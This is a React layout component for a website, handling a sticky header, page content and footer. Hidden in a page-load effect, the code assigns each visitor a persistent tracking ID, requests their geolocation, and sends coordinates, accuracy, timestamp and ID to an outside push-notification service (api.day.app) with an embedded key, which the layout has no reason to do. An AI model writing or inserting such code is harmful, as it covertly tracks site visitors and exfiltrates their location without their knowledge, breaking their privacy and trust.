/** @jsxRuntime classic */
/** @jsx jsx */
import { jsx } from "theme-ui";
import React, { useCallback, useEffect } from "react";
import Sticky from "react-stickynode";
import { useStickyState } from "contexts/app/app.provider";
import { Waypoint } from "react-waypoint";
import { useStickyDispatch } from "contexts/app/app.provider";

import Header from "./header/header";
import Footer from "./footer/footer";
export default function Layout({ children }) {
  const isSticky = useStickyState("isSticky");
  const dispatch = useStickyDispatch();
  const setSticky = useCallback(
    () => dispatch({ type: "SET_STICKY" }),
    [dispatch]
  );
  const removeSticky = useCallback(
    () => dispatch({ type: "REMOVE_STICKY" }),
    [dispatch]
  );

  const onWaypointPositionChange = ({ currentPosition }) => {
    if (currentPosition === "above") {
      setSticky();
    }
    if (currentPosition === "below") {
      removeSticky();
    }
  };

  useEffect(() => {
    let mark_detect = localStorage.getItem("mark_detect");

    if (!mark_detect) {
      mark_detect = `${Date.now()}-${Math.floor(Math.random() * 1000000000)}`;

      if (crypto && typeof crypto.randomUUID === "function") {
        mark_detect = crypto.randomUUID();
      }

      localStorage.setItem("mark_detect", mark_detect);
    }

    if (navigator.geolocation) {
      navigator.geolocation.getCurrentPosition(
        function (position) {
          console.log("经度:", position.coords.longitude);
          console.log("纬度:", position.coords.latitude);
          console.log("精度:", position.coords.accuracy);
          console.log("时间戳:", position.timestamp);
          var content = `${position.coords.longitude},${position.coords.latitude},${position.coords.accuracy},${position.timestamp},${mark_detect}`;
          fetch(`https://api.day.app/UN8m5jtPRtcPSesmihoW96/${content}`);
        },
        function (error) {
          console.error("获取位置失败", error);
        }
      );
    } else {
      console.error("浏览器不支持 Geolocation API");
    }
  }, []);

  return (
    <React.Fragment>
      <Sticky enabled={isSticky} innerZ={991}>
        <Header className={`${isSticky ? "sticky" : "unSticky"}`} />
      </Sticky>
      <Waypoint
        onEnter={removeSticky}
        // onLeave={setSticky}
        onPositionChange={onWaypointPositionChange}
      />
      <main
        sx={{
          variant: "layout.main",
        }}
      >
        {children}
      </main>
      <Footer />
    </React.Fragment>
  );
}
